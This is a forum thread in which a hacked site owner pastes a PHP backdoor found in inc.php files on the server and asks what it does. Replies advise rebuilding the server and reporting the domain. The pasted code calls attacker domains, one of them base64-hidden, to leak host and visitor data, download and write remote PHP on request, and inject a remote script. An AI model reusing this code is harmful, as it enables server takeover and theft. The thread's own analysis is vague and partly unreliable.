# My server was hacked. Somebody uploaded some scripts which I have no idea what those scripts has done to my server

Tags: php, server

Someone uploaded this script on our server

https://github.com/mIcHyAmRaNe/wso-webshell

And we have found inc.php files in different directories on our server. The inc file has this code in it

```
<?php
error_reporting(0);
$s='http://a1b2cd.club/';
$host = str_replace('www.', '', @$_SERVER['HTTP_HOST']);
$x = $s.'l-'.base64_encode($host);

if(function_exists('curl_init'))
{
$ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
if($gitt == false){
    @$gitt = file_get_contents($x);
}
}elseif(function_exists('file_get_contents')){
    @$gitt = file_get_contents($x);
}
echo $gitt;

if(isset($_GET['ksfg'])){
    $f=fopen($_GET['ksfg'].'.php','a');
    fwrite($f,file_get_contents($s.'s-'.$_GET['ksfg']));
    fclose($f);
}
echo '<!DOCTYPE html!>';
?><?php
function GetIP(){
    if(getenv("HTTP_CLIENT_IP")) {
        $ip = getenv("HTTP_CLIENT_IP");
    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {
        $ip = getenv("HTTP_X_FORWARDED_FOR");
        if (strstr($ip, ',')) {
            $tmp = explode (',', $ip);
            $ip = trim($tmp[0]);
        }
    } else {
        $ip = getenv("REMOTE_ADDR");
    }
    return $ip;
}
$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(function_exists('curl_init'))
{
    $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
    if($gitt == false){
        @$gitt = file_get_contents($x);
    }
}elseif(function_exists('file_get_contents')){
    @$gitt = file_get_contents($x);
}
?>
</marquee><script src=http://expoilt.com/ccb.js></script>
```

No idea what this script has done to our server. As our server is hosted on so should we create the new instance? or should we suspend cpanel account from whm and create a new one and copy each and every file there? Please help me to understand what this could code actually do

Comment: Yes, `create the new instance`. You don't know what they have done. You also should try to identify how they got in. Possibly open a ticket with your hosting company. See https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server

Comment: no auto update in that script, you could report the `byr00t.co` (is the b64 string) domain to godaddy, to ruin their c&c

Answer (score 0):

if you get hacked try to change first all the passwords and recheck the code added by yourself (original version till 3-rd party got into your site ... maybe put site offline till checks ...). Possible to have a defect there, which allowed 3-rd party to upload whatever wanted on your site ! (this have to be fixed)

 Regarding the added code, basically it's listing your site contends and ip-s(and some redirects ! - very dangerous for regular users). But what ever 3-rd party is going to do, have no clue ! (when get from outside admin privileges you could say that now it's acting as your_site owner).